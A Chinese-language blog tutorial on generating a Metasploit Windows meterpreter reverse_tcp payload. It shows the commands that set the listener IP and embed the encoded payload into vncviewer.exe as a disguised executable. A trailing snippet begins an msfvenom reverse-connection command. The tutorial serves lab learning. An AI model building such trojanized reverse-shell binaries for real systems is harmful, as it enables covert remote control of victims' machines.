Metasploit Framework —— Payload

2024-03-07 15:58

本文主要是介绍Metasploit Framework —— Payload,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

这里也是直接以练习为主,学习如何使用 payload:
!!!
附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode
!!!
这里我起初用的 payload 是 payload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/reverse_tcp,图我就不换了,原理是一样的

就以 windows 反弹 shell 为例:
搜索:search payload/windows/meterpreter/reverse_tcp
3331d032d605b7f9aca7fbdb94887c9.png

使用:use payload/windows/meterpreter/reverse_tcp
b32d24bac71d719a87cdd7fb0ac2d0e.png

有无需要配置的地方:show options
04adee39acee01087d94259dfa38e83.png

配置:set LHOST 192.168.67.221
[这里的 IP 为 kali IP]
bba11668d713863598f4f5a4ca87c34.png

生成该 shellcode 的时候我们可以查看一下帮助:
43663a0ec9fc98f52651217a8d3bf7a.png

其中最常用的有:
!!!

-i:对其进行编码的次数
-f:输出格式[如:exe,py,c,bash,java等]
-x: 指定模板[如:以 putty 为模板]
-k: 保留模板行为并将 payload 作为新线程注入
-o:输出到…

在这里生成一个以 vncviewer.exe 为模板,对其进行两次编码,且作为新线程注入到模板当中,输出格式为 exe 格式,输出到 /root/ 目录下并命名为 vnc.exe
generate -x /usr/share/windows-resources/binaries/vncviewer.exe -i 2 -k -f exe -o /root/vnc.exe
22a69391c2b1b1d102e8791e0d6918e.png

把生成的 exe 文件拉到 win10 看看:
0ca83f975c67d6007762ab5338a6631.png

好的,立马被查杀,关于免杀这块会有专门的讲解,就到先这里啦~

😄

这篇关于Metasploit Framework —— Payload的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/784059

相关文章

Windows中,.net framework 3.5安装

安装.net framework,目前已知2种方法,如下: 一、在MSDN下载对应的安装包,安装,这种可能无法安装成功,概率很大,不成功使用第二种方法,基本上没问题。 二、win8/8.1/10 下安装 .net framework 3.5.1: 1. 打开 win8/8.1/10 安装盘(这里指系统安装镜像文件),提取 sources\sxs 文件夹到 X:\sources\sxs (X代

Android Framework学习(四)之Launcher启动流程解析

在之前的博客中,我们学习了init进程、Zygote进程和SyetemServer进程的启动过程,我们知道SystemServer进程主要用于启动系统的各种服务,二者其中就包含了负责启动Launcher的服务,LauncherAppService,本篇博客我们将一起学习Launcher相关的知识。 Launcher概述 Launcher程序就是我们平时看到的桌面程序,它其实也是一个Androi

Android Framework学习(三)之SyetemServer进程启动解析

从上篇博客中,我们知道了Zygote进程启动了SyetemServer进程,本篇博客我们就一起来学习SyetemServer进程。 SystemServer的作用 整个系统的android framework进程启动流程如下: init进程 –> Zygote进程 –> SystemServer进程 –>各种应用进程 SystemServer进程主要的作用是启动各种系统服务,比如Activ

Android Framework学习(二)之Zygote进程启动解析

上篇博客,我们学习了init进程的相关知识,本篇博客我们一次来学习zygote进程的相关知识。 Zygote简介 在Android系统中,JavaVM(Java虚拟机)、应用程序进程以及运行系统的关键服务的SystemServer进程都是由Zygote进程来创建的,我们也将它称为孵化器。它通过fock(复制进程)的形式来创建应用程序进程和SystemServer进程,由于Zygote进程在启动

query string parameters 和request payload

HTTP请求中,如果是get请求,那么表单参数以name=value&name1=value1的形式附到url的后; post请求:表单参数是在请求体中,也是name=value&name1=value1的形式在请求。 export const voucherDetailAdd=(token,formStr) =>{return axios.post(`${base}/voucher/deta

Golang如何获取Request Payload的数据

前言 话说今天对接fe,发现一直出现参数错误的报错。对了参数格式没问题, 后面发现数据不是Form Data的,而是Request Payload的,所以来总结备忘下。 正文 ##了解Request Payload 这个要从POST请求说起: POST请求有两种方式: 1.方式一: Form Data形式 当POST请求的请求头里设置Content-Type: application/

Play framework 1.2.3 使用缓存、Memcached集成

play框架包含一个缓存lib,这个lib是用来和Memcached集成做分布式缓存用的。  如果不配置Memcached,play框架将会使用单独的缓存(EhCache),其数据存储在JVM的堆中。把数据存储在JVM的堆中 违反了play框架“不共享任何东西”的原则,这也导致了你不能把应用程序同时部署到多个机器,即不能在多个机器上负载均衡以保证应用的可用性、高性能(即使在多个机器部署

play Framework play json

概述     使用JSON的推荐方式是使用 Play 的基于类的JSON库,位于play.api.libs.json下.      该库构建于Jerkson之上,它是一个Scala包装者,基于一个超快的基于Java的JSON库,Jackson.     这种方式的好处是,Java和Scala可以共享同样的库(Jackson),而Scala用户可以享受额外类型安全的好处。

重学Android之Framework层应用程序进程创建流程

Android系统启动完成后,会启动第一Android应用Launcher。之后在用户操作下启动其他的应用程序。这两个流程大体一致,本文主要分析启动Launcher的启动流程。 Android系统源码版本:9.0.0_r3 整体流程图如下: Zygote启动流程 Android Kernel启动后启动第一个进程init,init将解析init.*.rc文件启动进程zygote。 /s

48-2 内网渗透 - 利用Metasploit提权

一、Metasploit提权过程概述 ·        Metasploit是一个开源的安全漏洞检测工具,广泛用于安全和IT专业人士识别、验证和利用安全漏洞,同时也支持专家驱动的安全评估和管理。 提权过程详解 1)生成后门 在Kali Linux上使用msfvenom生成反向连接的后门文件。 # ip 要改成自己kali的ipmsfvenom -p windows/x64/meterp